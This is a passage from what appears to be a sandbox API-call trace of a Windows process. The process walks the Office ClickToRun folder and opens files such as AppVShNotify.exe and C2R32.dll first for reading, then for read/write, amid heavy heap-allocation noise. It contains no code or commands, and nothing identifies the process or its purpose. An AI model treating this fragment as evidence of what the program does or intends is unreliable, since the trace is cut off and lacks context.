Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.578] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.578] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b3e121, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b3e121, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9e226c00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x406d8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppVShNotify.exe", cAlternateFileName="APPVSH~1.EXE")) returned 1 [0077.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0077.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0077.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0077.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0077.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0077.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0077.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0077.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0077.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0077.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0077.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0077.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0077.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0077.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0077.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0077.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0077.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0077.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0077.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0077.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0077.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0077.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0077.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0077.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0077.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0077.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0077.579] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.579] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.579] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.579] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0077.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0077.579] AreFileApisANSI () returned 1 [0077.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe", lpUsedDefaultChar=0x0) returned 75 [0077.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0077.579] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.579] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0077.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0077.579] AreFileApisANSI () returned 1 [0077.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0077.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85080 [0077.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x85080, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe") returned 75 [0077.579] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0077.580] GetFileType (hFile=0x430) returned 0x1 [0077.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85080 | out: hHeap=0x20000) returned 1 [0077.580] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0077.580] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0077.580] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0077.580] CloseHandle (hObject=0x430) returned 1 [0077.580] AreFileApisANSI () returned 1 [0077.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0077.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85580 [0077.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x85580, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe") returned 75 [0077.581] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0077.581] GetFileType (hFile=0x430) returned 0x1 [0077.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85580 | out: hHeap=0x20000) returned 1 [0077.581] CloseHandle (hObject=0x430) returned 1 [0077.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0077.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0077.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0077.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0077.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0077.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0077.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0077.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0077.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0077.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0077.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0077.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0077.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0077.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0077.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0077.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0077.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0077.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0077.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0077.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0077.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0077.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0077.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0077.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0077.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0077.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0077.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0077.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0077.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0077.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0077.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0077.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0077.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0077.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0077.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0077.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0077.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0077.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0077.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0077.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0077.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0077.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0077.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0077.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0077.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0077.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0077.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0077.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0077.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0077.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0077.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0077.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0077.582] AreFileApisANSI () returned 1 [0077.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0077.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x854e0 [0077.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x854e0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe") returned 75 [0077.583] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b3e121, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b3e121, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9e226c00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x406d8)) returned 1 [0077.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x854e0 | out: hHeap=0x20000) returned 1 [0077.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0077.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0077.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0077.583] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.583] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.583] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b3e121, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b3e121, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x14115400, ftLastWriteTime.dwHighDateTime=0x1d0d7a5, nFileSizeHigh=0x0, nFileSizeLow=0xc84c0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="C2R32.dll", cAlternateFileName="")) returned 1 [0077.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0077.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0077.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0077.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0077.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0077.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0077.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0077.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0077.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0077.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0077.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0077.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0077.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0077.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0077.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0077.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0077.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0077.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0077.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0077.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0077.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0077.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0077.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0077.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0077.584] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.584] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.584] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.584] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0077.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0077.584] AreFileApisANSI () returned 1 [0077.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll", lpUsedDefaultChar=0x0) returned 68 [0077.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0077.584] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.584] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0077.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0077.584] AreFileApisANSI () returned 1 [0077.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0077.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82e68 [0077.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x82e68, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll") returned 68 [0077.584] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0077.585] GetFileType (hFile=0x430) returned 0x1 [0077.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82e68 | out: hHeap=0x20000) returned 1 [0077.585] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0077.585] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0077.585] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0077.585] CloseHandle (hObject=0x430) returned 1 [0077.586] AreFileApisANSI () returned 1 [0077.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0077.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82058 [0077.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x82058, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll") returned 68 [0077.586] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0077.586] GetFileType (hFile=0x430) returned 0x1 [0077.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82058 | out: hHeap=0x20000) returned 1 [0077.586] CloseHandle (hObject=0x430) returned 1 [0077.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0077.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0077.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0077.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0077.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0077.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0077.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0077.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0077.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0077.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0077.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0077.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0077.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0077.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0077.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0077.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0077.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0077.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0077.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0077.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0077.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0077.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0077.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0077.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0077.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0077.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0077.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0077.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0077.587] HeapFree 